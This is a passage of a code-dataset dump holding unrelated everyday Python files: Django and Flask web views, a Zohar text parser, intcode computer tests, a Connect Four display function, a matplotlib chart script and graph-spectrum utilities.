...models import HisHistory, TskTask\nfrom ...permission import Permission\nfrom .ApiResponse import ApiResponse\nfrom .Global import Global\n\n\nclass TasksId(Global):\n\n    def get(self, request, id):\n\n        tsk = TskTask.objects.get(id=id)\n\n        # Check that the user has read permission on the project\n        if tsk.pro_project.getPermission(self.User) < Permission.View:\n            return ApiResponse.Generate401()\n\n        response = tsk.to_dict()\n        response['project'] = tsk.pro_project.to_dict()\n        response['creator'] = tsk.usr_owner.to_dict()\n        response['parents'] = []\n\n        current = tsk\n        while current.tsk_parent is not None:\n            current = current.tsk_parent\n            response['parents'].append(current.to_dict(recursive=False))\n\n        return JsonResponse(response)\n\n    def put(self, request, id):\n\n        tsk = TskTask.objects.get(id=id)\n\n        tmpLastState = tsk.state\n        tsk.name = self.data.get('name', '')\n        tsk.description = self.data.get('description', None)\n        tsk.deadlineat = self.data.get('deadlineat', None)\n        tsk.location = self.data.get('location', None)\n        tsk.priority = self.data.get('priority', 0)\n        tsk.state = self.data.get('state', 'NONE')\n        tsk.order = self.data.get('order', '1')\n        tsk.collapsed = self.data.get('collapsed', False)\n        tsk.tsk_parent_id = self.data.get('tsk_parent', None)\n\n        # Keep the doneat timestamp in sync with the state\n        if tmpLastState != 'DONE' and tsk.state == 'DONE':\n            tsk.doneat = timezone.now()\n        elif tsk.state != 'DONE':\n            tsk.doneat = None\n\n        # Check that the user has write permission on the project\n        if tsk.pro_project.getPermission(self.User) < Permission.Edit:\n            return ApiResponse.Generate401()\n\n        # Validate the parent task\n        if tsk.tsk_parent_id is not None:\n\n            if (tsk.tsk_parent.pro_project != tsk.pro_project or\n                    tsk.tsk_parent == tsk):\n                return ApiResponse.Generate422('Data invalid: Parent task')\n\n        tsk.save()\n        HisHistory.log(\"PUT\", tsk, self.User)\n\n        return JsonResponse({})\n\n    def delete(self, request, id):\n\n        tsk = TskTask.objects.get(id=id)\n\n        # Check that the user has write permission on the project\n        if tsk.pro_project.getPermission(self.User) < Permission.Edit:\n            return ApiResponse.Generate401()\n\n        HisHistory.log(\"DELETE\", tsk, self.User)\n        tsk.delete()\n\n        return 
ApiResponse.Generate204()\n","sub_path":"Focus/api/v1/TasksId.py","file_name":"TasksId.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"320965369","text":"from enum import Enum\nfrom itertools import count\nfrom collections import OrderedDict\nfrom docx2python import docx2python\n\nfrom sefaria.model import Ref\n\n\nclass Formatting(Enum):\n    BOLD = 1\n    ITALICS = 2\n    BOLD_ITALICS = 3\n    FADED = 4\n\n\nclass FootnoteType(Enum):\n    CITATION = 1  # 2nd column\n    SYMBOL = 2\n    FOOTNOTE = 3\n    INFINITY = 4\n    STAR = 5\n    TRIANGLE = 6\n    ENDNOTE = 7\n    DIAMONDS = 8  # second star\n\n\ndef get_symbol(footnote):\n    if footnote.footnote_type == FootnoteType.INFINITY:\n        return '∞'\n    elif footnote.footnote_type == FootnoteType.STAR:\n        return '☉'\n    elif footnote.footnote_type == FootnoteType.DIAMONDS:\n        return '☼'\n    elif footnote.footnote_type == FootnoteType.TRIANGLE:\n        return '△'\n    elif footnote.footnote_type in [FootnoteType.FOOTNOTE, FootnoteType.ENDNOTE]:\n        return footnote.footnote_number\n    # elif footnote.footnote_type == FootnoteType.CITATION:\n    #     # post citation\n    #     return None\n    else:\n        return None\n\n\ndef get_tag(formatting_type, opening_tag=True):\n    if not formatting_type:\n        return ''\n    attributes = None\n    if formatting_type == Formatting.BOLD:\n        tags = ['b']\n    elif formatting_type == Formatting.FADED:\n        tags = ['span']\n        attributes = 'class=\"mediumGrey\"'\n    elif formatting_type == Formatting.ITALICS:\n        tags = ['i']\n    elif formatting_type == Formatting.BOLD_ITALICS:\n        tags = ['b', 'i']\n\n    tag_string = ''\n    for tag in tags:\n        tag_string += f'<{\"/\" if not opening_tag else \"\"}{tag}{\" \" + attributes if attributes and opening_tag else \"\"}>'\n    return tag_string\n\n\ndef strip_symbol(to_strip):  # TODO: move into HtmlParser if HTML based\n    # the marker symbols defined in get_symbol()\n    for symbol in ['∞', '☉', '☼', '△']:\n        to_strip = to_strip.replace(symbol, '')\n    return to_strip\n\nclass Word(object):\n    \"\"\"Word in the Solomon Tikkunei Zohar\"\"\"\n    ids = count(0)\n\n    def __init__(self, text, phrase, line, paragraph, daf, tikkun, footnotes=None):\n        self.id = next(self.ids)\n        self.text = text\n        self.phrase = phrase\n        self.line = line\n        self.paragraph = paragraph\n        self.daf = daf\n        self.tikkun = tikkun\n        self.footnotes = list(footnotes) if footnotes else []\n\n    def add_to_word(self, str):\n        self.text += str\n\n    def add_new_footnote(self, footnote_type, formatting, footnote):\n        footnote = Footnote(footnote_type, formatting, self, footnote)\n        self.footnotes.append(footnote)\n        return footnote\n\n\nclass Phrase(object):\n    \"\"\"1 or more words formatted a particular way\"\"\"\n\n    def __init__(self, formatting, line, paragraph, daf, tikkun):\n        self.words = []\n        self.word_or_phrases = []\n        self.footnotes = []\n        self.line = line\n        self.paragraph = paragraph\n        self.daf = daf\n        self.tikkun = tikkun\n        self.formatting = formatting\n\n    def add_new_word(self, text, footnotes=[]):\n        # Word expects the owning phrase as its second argument\n        new_word = Word(text, self, self.line, self.paragraph, self.daf, self.tikkun, footnotes)\n        self.words.append(new_word)\n        self.line.words.append(new_word)\n        self.paragraph.words.append(new_word)\n        # print(new_word.text)\n        return new_word\n\n    def add_word_or_phrase(self, word_or_phrase):\n        self.word_or_phrases.append(word_or_phrase)\n\n\nclass Quoted(object):\n    def __init__(self, paragraph, daf, tikkun):\n        self.words = []\n        self.footnotes = []\n        # self.line = line\n        self.paragraph = paragraph\n        self.daf = daf\n        self.tikkun = tikkun\n        self.complete = False\n\n    def add_word(self, word):\n        self.words.append(word)\n\n    def end_quote(self):\n        self.complete = True\n\n    
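# A Quoted span is opened by Paragraph.add_new_quoted(), collects words while it\n    # sits on the paragraph's quoted_cursor stack, and is sealed by end_quote()\n    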
def is_complete(self):\n        return self.complete\n\n    def add_footnote(self, footnote):\n        self.footnotes.append(footnote)\n\n\nclass Line(object):\n    \"\"\"Ordered phrases\"\"\"\n\n    def __init__(self, paragraph, daf, tikkun, line_number):\n        self.phrases = []\n        self.paragraph = paragraph\n        self.daf = daf\n        self.words = []\n        self.tikkun = tikkun\n        self.line_number = line_number\n\n    def add_new_phrase(self, formatting):\n        phrase = Phrase(formatting, self, self.paragraph, self.daf, self.tikkun)\n        self.phrases.append(phrase)\n        self.paragraph.phrases.append(phrase)\n        self.daf.phrases.append(phrase)\n        self.tikkun.phrases.append(phrase)\n        return phrase\n\n\nclass Paragraph(object):\n    \"\"\"Multiple lines grouped together\"\"\"\n\n    def __init__(self, tikkun, daf, paragraph_number):\n        self.lines = []\n        self.phrases = []\n        self.footnotes = []\n        self.quoted = []\n        self.words = []\n        self.he_words = None\n        self.quoted_cursor = []\n        # self.inside_quotes = False\n        self.enter_quotes_on_next_word = False\n        self.exit_quotes_on_next_word = False\n        self.tikkun = tikkun\n        self.daf = daf\n        self.paragraph_number = paragraph_number\n        self.line_number = count(0)\n\n    def add_new_line(self):\n        line = Line(self, self.daf, self.tikkun, next(self.line_number))\n        self.lines.append(line)\n        self.tikkun.lines.append(line)\n        self.daf.lines.append(line)\n        return line\n\n    def add_new_quoted(self):\n        self.quoted_cursor.append(Quoted(self, self.daf, self.tikkun))\n        # self.inside_quotes = True\n        # self.enter_quotes_on_next_word = True\n\n    def commit_quoted(self):\n        if len(self.quoted_cursor) == 0:\n            # print(\"End Quote Only\")\n            # print(self.words[-1].text)\n            pass\n        else:\n            # print([word.text for word in self.quoted_cursor[-1].words])\n            self.quoted.append(self.quoted_cursor[-1])\n            # self.inside_quotes = False\n            self.quoted_cursor.pop()\n\n        # self.exit_quotes_on_next_word = True\n\n    def add_to_quoted_if_in_quotes(self, word):\n        # if len(self.quoted_cursor) > 0:\n        for quote in self.quoted_cursor:\n            quote.add_word(word)\n\n    ref_replace_dict = {\n        \"Naḥ\": \"Nah\",\n        \"Naḥ.\": \"Nah\",\n        \"Ḥab\": \"Hab\",\n        \"Lev.\": \"Lev\",\n        \"Ez.\": \"Ezekiel\",\n        \"1 King.\": \"1 Kings\",\n        \"2 King.\": \"2 Kings\",\n        \"Jer.\": \"Jeremiah\",\n        \"Ez\": \"Ezekiel\",\n    }\n\n    def get_links(self):\n        links = []\n        for footnote in self.footnotes:\n            if footnote.footnote_type == FootnoteType.CITATION:\n                ref1 = 'Tikkunei Zohar ' + self.daf.name + ':' + str(self.paragraph_number + 1)\n                try:\n                    for key, value in self.ref_replace_dict.items():\n                        if footnote.text.startswith(key):\n                            footnote.text = footnote.text.replace(key, value, 1)\n                            footnote.text = footnote.text.replace('see: ', '')\n                            footnote.text = footnote.text.replace('see ', '')\n                            break\n                    ref2 = Ref(footnote.text)\n                    links.append({\"refs\": [ref1, str(ref2)], \"type\": \"Citation\", \"auto\": True, \"generated_by\": \"solomon_tz_parse_nm\"})\n                except:\n                    print('failed to parse ref ' + footnote.text)\n        return links\n\n    def get_words(self):\n        words = ''\n        for line in self.lines:\n            for phrase in line.phrases:\n                # for word in phrase.words:\n                words_in_phrase = ''\n                for word in phrase.words:\n                    if words_in_phrase != '':\n                        words_in_phrase += ' '\n                    else:\n                        words_in_phrase += get_tag(phrase.formatting)\n                    words_in_phrase += word.text\n                    for footnote in word.footnotes:\n                        if type(footnote.anchor) is Word:\n                            anchor = footnote.anchor.text\n                        else:  # Phrase\n                            anchor = ' '.join([word.text for word in footnote.anchor.words])\n                        footnote_symbol = get_symbol(footnote)\n                        if footnote_symbol:\n                            words_in_phrase += '<sup>' + footnote_symbol + '</sup>' +\\\n                                '<i class=\"footnote\">' \\\n                                + strip_symbol(footnote.text) + '</i>'\n                        else:\n                            # TODO: handle other footnote types\n                            pass\n                words_in_phrase += get_tag(phrase.formatting, False)\n                # words_in_phrase = ' '.join([word.text for word in phrase.words])\n                if words != '':\n                    words += ' '\n                words += words_in_phrase\n            words += '<br>'\n        if words.endswith('<br>'):\n            words = words[:-len('<br>')]\n        # for footnote in phrase.footnotes:\n\n        return words\n\n    # def add_to_quoted_if_necessary(self, word):\n    #     if self.inside_quotes or self.enter_quotes_on_next_word:\n    #         self.quoted_cursor[-1].add_word(word)\n    #         self.inside_quotes = True\n    #         self.enter_quotes_on_next_word = False\n    #     if self.exit_quotes_on_next_word:\n    #         self.inside_quotes = False\n    #         self.exit_quotes_on_next_word = False\n\n\nclass Daf(object):\n    def __init__(self, name):\n        self.name = name\n        self.he_name = None\n        self.lines = []\n        self.paragraphs = []\n        self.phrases = []\n        self.footnotes = []\n        self.paragraph_number = count(0)\n\n\nclass Tikkun(object):\n    def __init__(self, name, number):\n        self.words = []\n        self.paragraphs = []\n        self.he_name = None\n        self.lines = []\n        self.phrases = []\n        self.footnotes = []\n        self.name = name\n        self.number = number\n\n\nclass Footnote(object):\n    def __init__(self, footnote_type, formatting, anchor=None, text=''):\n        self.anchor = anchor\n        self.text = text\n        self.footnote_type = footnote_type\n        self.footnote_number = None\n        self.formatting = formatting\n\n\nclass TikkuneiZohar(object):\n    def __init__(self):\n        self.tikkunim = []\n        self.dapim = []\n\n# do we need the\n","sub_path":"sources/tikkunei_zohar/tz_base.py","file_name":"tz_base.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143718136","text":"from flask_restful import Resource\nfrom model.Database import User, Language, Framework, Ide, OS\n\n\nclass Result(Resource):\n    @classmethod\n    def get(cls):\n        print(len(User.query.all()))\n        '''\n        The objective is to build an array holding the vote count for each option,\n        then convert each count to a percentage, which gives the survey result.\n        '''\n        count = 0\n        count1 = 0\n        language_array = [0]*len(Language.query.all())  # an array with one zeroed slot per option\n        framework_array = [0]*len(Framework.query.all())\n        ide_array = [0]*len(Ide.query.all())\n        os_array = [0]*len(OS.query.all())\n\n        for user in User.query.all():\n            count += 1\n            for language in Language.query.all():\n                if language.language_name == user.language:\n                    language_array[count1] = language_array[count1]+1\n                    break\n                count1 += 1\n            count1 = 0\n            for framework in Framework.query.all():\n                if framework.framework_name == user.framework:\n                    framework_array[count1] = framework_array[count1] + 1\n                    break\n                else:\n                    count1 += 1\n            count1 = 0\n            for ide in Ide.query.all():\n                if ide.ide == user.ide:\n                    ide_array[count1] = ide_array[count1] + 1\n                    break\n                else:\n                    count1 += 1\n            count1 = 0\n            for os in OS.query.all():\n                if os.os == user.os:\n                    os_array[count1] = os_array[count1] + 1\n                    break\n                else:\n                    count1 += 1\n        '''\n        Now, to render the result, build a display string for each option.\n        '''\n        language_string = ['']*len(Language.query.all())\n        framework_string = ['']*len(Framework.query.all())\n        ide_string = ['']*len(Ide.query.all())\n        os_string = ['']*len(OS.query.all())\n\n        # initializer\n        i = 0\n        for languages in Language.query.all():\n            language_array[i] = language_array[i]*100/count\n            language_string[i] = languages.language_name + \" : \" + str(language_array[i])\n            i += 1\n        i = 0\n        for framework in Framework.query.all():\n            framework_array[i] = framework_array[i]*100/count\n            framework_string[i] = framework.framework_name + \" : \" + str(framework_array[i])\n            i += 1\n        i = 0\n        for ides in Ide.query.all():\n            ide_array[i] = ide_array[i]*100/count\n            ide_string[i] = ides.ide + \" : \" + 
str(ide_array[i])\n            i += 1\n        i = 0\n        for os in OS.query.all():\n            os_array[i] = os_array[i]*100/count\n            os_string[i] = os.os + \" : \" + str(os_array[i])\n            i += 1\n\n        return {\"language\": language_array, \"framework\": framework_array, \"ide\": ide_array, \"os\": os_array}\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"resource/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557969690","text":"import pytest\n\nfrom intcomp import integerComputer\n\n@pytest.fixture\ndef intcomp():\n    \"\"\"intcomp with empty program\"\"\"\n    intcomp = integerComputer()\n    intcomp.program = []\n    intcomp.outputs = []\n    intcomp.inputs = []\n    return intcomp\n\n\n\ndef test_readProgramFile(intcomp):\n    intcomp.readProgramFile(\"testfile.txt\")\n    testprogram = [1,2,3,4,7]\n    assert intcomp.program == testprogram\n\ndef test_addMemory(intcomp):\n    intcomp.program = [0]\n    intcomp.addMemory(1204978)\n    assert intcomp.program == ([0] * 1204979)\n\ndef test_getArgument(intcomp):\n    intcomp.program = [1,4,5,6,35,12,0]\n    assert intcomp.getArgument(1, 0) == 35\n    assert intcomp.getArgument(1, 1) == 4\n    intcomp.revBase = 2\n    assert intcomp.getArgument(1, 2) == 0\n\ndef test_add(intcomp):\n    intcomp.program = [1,4,5,6,35,12,0]\n    intcomp.add(0, 0, 2)\n    assert intcomp.program == [1,4,5,6,35,12,47]\n    assert intcomp.pointer == 4\n\ndef test_multiply(intcomp):\n    intcomp.program = [1,4,5,6,6,12,0]\n    intcomp.multiply(0, 0, 2)\n    assert intcomp.program == [1,4,5,6,6,12,72]\n    assert intcomp.pointer == 4\n\ndef test_input(intcomp):\n    intcomp.program = [3, 2, 0]\n    intcomp.input(17, 1)\n    assert intcomp.program == [3, 2, 17]\n    assert intcomp.pointer == 2\n\ndef test_output(intcomp):\n    intcomp.program = [4, 2, 0]\n    intcomp.output(0)\n    assert intcomp.outputs[0] == 0\n    intcomp.pointer = 0\n    intcomp.output(1)\n    assert intcomp.outputs[1] == 2\n    assert intcomp.pointer == 2\n\ndef test_jumpIfTrue(intcomp):\n    intcomp.program = [5, 0, 0, 6, 6]\n    intcomp.jumpIfTrue(1,0)\n    assert intcomp.pointer == 3\n    intcomp.pointer = 0\n    intcomp.program = [5, 1, 0, 6, 6, 7]\n    intcomp.jumpIfTrue(0, 1)\n    assert intcomp.pointer == 0\n    intcomp.pointer = 0\n    intcomp.program = [5, 1, 0, 6, 6, 7]\n    intcomp.jumpIfTrue(0, 0)\n    assert intcomp.pointer == 5\n\ndef test_jumpIfFalse(intcomp):\n    intcomp.program = [5, 0, 0, 6, 6]\n    intcomp.jumpIfFalse(1,0)\n    assert intcomp.pointer == 5\n    intcomp.pointer = 0\n    intcomp.program = [5, 1, 0, 6, 6, 7]\n    intcomp.jumpIfFalse(0, 1)\n    assert intcomp.pointer == 3\n    intcomp.pointer = 0\n    intcomp.program = [5, 3, 0, 0, 6, 7]\n    intcomp.jumpIfFalse(0, 0)\n    assert intcomp.pointer == 5\n\ndef test_lessThan(intcomp):\n    intcomp.program = [6, 0, 2, 0]\n    intcomp.lessThan(1,1,2)\n    assert intcomp.program == [1, 0, 2, 0]\n    intcomp.pointer = 0\n    intcomp.program = [6, 0, 2, 0]\n    intcomp.lessThan(0,1,0)\n    assert intcomp.program == [0, 0, 2, 0]\n    assert intcomp.pointer == 4\n\ndef test_equals(intcomp):\n    intcomp.program = [7, 0, 2, 0]\n    intcomp.equals(1,1,0)\n    assert intcomp.program == [0, 0, 2, 0]\n    intcomp.pointer = 0\n    intcomp.program = [7, 1, 1, 0]\n    intcomp.equals(0,1,2)\n    assert intcomp.program == [1, 1, 1, 0]\n    assert intcomp.pointer == 4\n\ndef trest_revBaseOffset(intcomp):\n    intcomp.revBase = 0\n    intcomp.program = [109, 2, 6, 4, 7]\n    intcomp.pointer = 0\n    intcomp.revBaseOffset(1)\n    assert intcomp.revBase == 2\n    intcomp.pointer = 0\n    intcomp.revBaseOffset(2)\n    assert intcomp.revBase == 6\n    assert intcomp.pointer == 2\n\ndef 
test_day02(intcomp):\n    intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day02.txt\")\n    intcomp.run(0)\n    assert intcomp.program[0] == 4462686\n\ndef test_day05(intcomp):\n    intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day05.txt\")\n    intcomp.run(5)\n    assert intcomp.outputs[0] == 8805067\n\ndef test_day09(intcomp):\n    intcomp.pointer = 0\n    intcomp.revBase = 0\n    intcomp.program = [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]\n    intcomp.addMemory(100000)\n    intcomp.run(0)\n    assert intcomp.outputs == [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]\n\n    intcomp.pointer = 0\n    intcomp.revBase = 0\n    intcomp.outputs = []\n    intcomp.program = [1102,34915192,34915192,7,4,7,99,0]\n    intcomp.addMemory(100000)\n    intcomp.run(0)\n    assert len(str(intcomp.outputs[0])) == 16\n\n    intcomp.pointer = 0\n    intcomp.revBase = 0\n    intcomp.outputs = []\n    intcomp.program = [104,1125899906842624,99]\n    intcomp.run(0)\n    assert intcomp.outputs[0] == 1125899906842624\n\n    intcomp.reset()\n    intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day09.txt\")\n    intcomp.addMemory(10000)\n    intcomp.run(2)\n    assert intcomp.outputs[0] == 69781\n","sub_path":"day09/python/thomg/test_intcomp.py","file_name":"test_intcomp.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"627262668","text":"def affichage_V2(grille):\n    # builds one display row per board row of the 6x7 Puissance 4 grid\n    lignes = []\n    for rangee in grille:\n        ligne = '|'\n        for case in rangee:\n            ligne += (case if case != '' else ' ') + '|'\n        lignes.append(ligne)\n\n    print(' 1 2 3 4 5 6 7')\n    for ligne in lignes:\n        print(ligne)\n","sub_path":"Theme A/DM 1/Puissance4_affichage_V2.py","file_name":"Puissance4_affichage_V2.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553383281","text":"\"\"\"shopping_system URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. 
Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom home import views as home_views\nfrom user_home import views as user_home_views\nfrom shopping_home import views as shopping_home_views\nfrom news_home import views as news_home_views\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^home$', home_views.home),\n    # image captcha\n    url(r'^captcha', include('captcha.urls')),\n    # user center routes\n    url(r'^index/', user_home_views.index),\n    url(r'^login/', user_home_views.login),\n    url(r'^register/', user_home_views.register),\n    url(r'^modify/', user_home_views.modify),\n    url(r'^logout/', user_home_views.logout),\n    url(r'^order/', user_home_views.order),\n    # shopping mall routes\n    url(r'^shop/', shopping_home_views.shop),\n    url(r'^type/', shopping_home_views.type),\n    url(r'^goods/', shopping_home_views.goods),\n    url(r'^buy/', shopping_home_views.buy),\n    url(r'^shop_car/', shopping_home_views.shop_car),\n    url(r'^offer/', shopping_home_views.offer),\n    url(r'^search/', shopping_home_views.search),\n    # news center routes\n    url(r'^news_home/', news_home_views.news),\n]\n","sub_path":"shopping_system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279881605","text":"#-*- coding: utf8 -*-\r\n\r\nfrom django.db import models\r\nfrom tinymce import models as tinymce_model\r\n\r\n# Create your models here.\r\n\r\n\r\nclass Article(models.Model):\r\n    picture = models.ImageField('Картинка', upload_to=\"images/news/\")\r\n    date = models.DateField('Дата создания')\r\n    theme = models.CharField('Тема', max_length=40)\r\n    shortname = models.CharField('Короткое имя (для ссылки)', max_length=20)\r\n    text = tinymce_model.HTMLField('Текст новости')\r\n\r\n    def __str__(self):\r\n        return \"%s \" % (unicode(unicode(self.theme)))\r\n\r\n\r\n    def __unicode__(self):\r\n        return \"%s \" % (unicode(unicode(self.theme)))\r\n\r\n    class Meta:\r\n        verbose_name = 'новость'\r\n        verbose_name_plural = 'новости'\r\n\r\n\r\nclass Partner(models.Model):\r\n    types = (\r\n        ('1', 'Генеральный партнёр'),\r\n        ('2', 'Ключевой партнёр'),\r\n        ('3', 'Карьерный партнёр'),\r\n        ('4', 'Информационный партнёр'),\r\n    )\r\n    picture = models.ImageField('Фотография', upload_to='images/logos/%D')\r\n    name = models.CharField('Название', max_length=30)\r\n    type = models.CharField('Тип', max_length=1, choices=types)\r\n    url = models.CharField('URL', max_length=60)\r\n\r\n    def __str__(self):\r\n        return \"%s \" % (unicode(unicode(self.name)))\r\n\r\n    def __unicode__(self):\r\n        return \"%s \" % (unicode(unicode(self.name)))\r\n\r\n    class Meta:\r\n        verbose_name = 'партнёр'\r\n        verbose_name_plural = 'партнёры'\r\n\r\nclass Activity(models.Model):\r\n    types = (\r\n        ('Career Zone', 'Career Zone',),\r\n        ('Corporate Zone','Corporate Zone'),\r\n        ('Startup Zone', 'Startup Zone',),\r\n        ('Creative Zone','Creative Zone',),\r\n        ('Skills up','Skills up',),\r\n        ('Success Zone','Success Zone',),\r\n        (u'Другое', u'Другое',),\r\n    )\r\n    name = models.CharField('Имя', max_length=60)\r\n    shortname = models.CharField('Короткое имя (для ссылки)', max_length=20)\r\n    type = models.CharField('Тип', max_length=30, choices=types)\r\n    photo = models.ImageField('Фотография', blank=True, 
upload_to='images/photos/')\n place = models.CharField('Где проводится', blank=True, max_length=20)\n speaker = models.CharField('Докладчик', blank=True, max_length=30)\n position = models.CharField('Должность докладчика', blank=True, max_length=100)\n cospeakers = models.CharField('Со-докладчики (через ;)', blank=True, max_length=500)\n description = tinymce_model.HTMLField(blank=True)\n time = models.TimeField('Время выступления')\n\n def __str__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n def __unicode__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n class Meta:\n verbose_name = 'доклад'\n verbose_name_plural = 'доклады'\n\nclass Settings(models.Model):\n vk_link = models.CharField('Ссылка ВКонтакте', max_length=30)\n fb_link = models.CharField('Ссылка в Facebook', max_length=30)\n reg_link = models.CharField('Ссылка на регистрацию', max_length=40)\n y_2014_link = models.CharField('Ссылка на 2014 год', max_length=40)\n y_2013_link = models.CharField('Ссылка на 2013 год', max_length=40)\n y_2012_link = models.CharField('Ссылка на 2012 год', max_length=40)\n\n class Meta:\n verbose_name = 'настройки'\n verbose_name_plural = 'настройки'","sub_path":"CareerNight/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10631283","text":"#!/usr/bin/env python3\n\n\"\"\"\n=========================================================================\nA Python script to plot my phone's internal storage usage with matplotlib\n=========================================================================\n\nAuthor: Tadej Janež\nLicense: MIT\n\nBased on https://matplotlib.org/mpl_examples/pie_and_polar_charts/pie_demo_features.py\n\n\"\"\"\nfrom pathlib import Path\n\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\n\n# My phone's internal storage usage by file type\nfile_types_and_usage = (\n ('image | jpeg', 1483),\n ('video | mp4', 678),\n ('audio | mpeg', 642),\n ('audio | ogg', 405),\n ('application | octet-stream', 103),\n ('other', 247),\n)\n\n# Prepare fonts\nfont1 = FontProperties()\nfont1.set_family('Source Han Sans TW')\nfont2 = font1.copy()\nfont2.set_size('small')\n\n# Prepare subplots\nfig1, ax1 = plt.subplots()\n\n# Draw pie chart\n_, texts, autotexts = ax1.pie(\n # sizes\n [ftu[1] for ftu in file_types_and_usage],\n labels=[ftu[0] for ftu in file_types_and_usage],\n autopct='%1.f%%',\n pctdistance=0.7,\n startangle=90\n)\n# Set equal aspect ratio to ensure that pie is drawn as a circle\nax1.axis('equal')\n\n# Set fonts\nplt.setp(texts, fontproperties=font1)\nplt.setp(autotexts, fontproperties=font2)\n\nfig1.savefig(str(Path('..', 'images', 'android-internal-storage-backup-usage.svg')))\n","sub_path":"scripts/android-internal-storage-backup-usage.py","file_name":"android-internal-storage-backup-usage.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301604956","text":"from debt_context.models import CityDebt, CountyDebt, SchoolDistrictDebt\nfrom debt_context.services.city_context_service import CityContextService\nfrom debt_context.services.county_context_service import CountyContextService\nfrom debt_context.services.isd_context_service import ISDContextService\n\n\nclass ContextService(object):\n def __init__(self, issuer):\n self.issuer = issuer\n self.city_context_service = CityContextService(issuer)\n 
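# one sub-service per issuer type; context() below dispatches on type(issuer)\n        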
self.county_context_service = CountyContextService(issuer)\n self.isd_context_service = ISDContextService(issuer)\n\n def context(self):\n if type(self.issuer) is CityDebt:\n return {\n 'population': self.city_context_service.population_context(),\n 'assessedValuation': self.city_context_service.assessed_valuation()\n }\n elif type(self.issuer) is CountyDebt:\n return {\n 'population': self.county_context_service.population_context(),\n 'assessedValuation': self.county_context_service.assessed_valuation()\n }\n elif type(self.issuer) is SchoolDistrictDebt:\n return {\n 'students': self.isd_context_service.debt_similar_school_size(),\n 'debtToAssessedValuation': self.isd_context_service.similar_assessed_valuation()\n }\n","sub_path":"debt_context/services/context_service.py","file_name":"context_service.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251198459","text":"import numpy as np \nfrom networkx.linalg.laplacianmatrix import laplacian_matrix, normalized_laplacian_matrix\nfrom scipy.sparse.linalg import eigs as sparse_eigs\nimport core.state as state\nimport networkx as nx\n\ndef _get_inputs():\n G = state.GRAPH\n n = len(state.GRAPH.nodes)\n in_degrees = G.in_degree()\n input_enc = np.array([in_degrees[i] == 0 for i in range(n)]).reshape(n,1)\n return input_enc\n\ndef _adjust_weights():\n G = state.GRAPH\n out_degrees = G.out_degree()\n for u, v, d in G.edges(data=True):\n deg = out_degrees[u]\n d['weight_out'] = 1/deg\n\ndef _get_lap_mat():\n _adjust_weights()\n G = state.GRAPH.to_undirected()\n return nx.laplacian_matrix(G, weight=\"weight_out\")\n\ndef _get_laplacian_spectrum(k=None):\n # get the k smallest eigenvalues of the laplacian\n lap = _get_lap_mat()\n if k is None:\n k = len(state.GRAPH.nodes()) - 2\n # print(lap)\n \n # lap = lap.asfptype()\n lambdas = sparse_eigs(lap, k=k, return_eigenvectors=False, which=\"SR\") # get k smallest eigenvalues\n return np.real(np.sort(lambdas))\n\ndef _compute_w_eigs(n, k):\n eig_vals = np.ones(k) * np.floor(n/k)\n for i in range(n % k):\n eig_vals[i] += 1\n return eig_vals\n\ndef _laplacian_spectral_bound(lambdas, M):\n # given lambdas, compute the spectral bound\n G = state.GRAPH\n k, n = len(lambdas), len(G.nodes)\n k_vals = list(range(2,k))\n def compute_bound(i):\n w_eigs = _compute_w_eigs(n, i)\n return np.dot(w_eigs, lambdas[:i]) - 2*i*M\n vals = [compute_bound(i) for i in k_vals]\n maxval = np.max(vals)\n maxk = k_vals[np.argmax(vals)]\n return maxval, maxk\n\ndef count_inputs_outputs():\n G = state.GRAPH\n n = len(G.nodes)\n out_degrees = G.out_degree()\n in_degrees = G.in_degree()\n count = 0\n for i in range(n):\n if in_degrees[i] == 0 or out_degrees[i] == 0:\n count += 1\n return count\n\ndef compute_eigenvalue_bound(M_vals, k=None):\n disk_count = count_inputs_outputs()\n # print(disk_count)\n lambdas = _get_laplacian_spectrum(k)\n return disk_count, [_laplacian_spectral_bound(lambdas, M) for M in 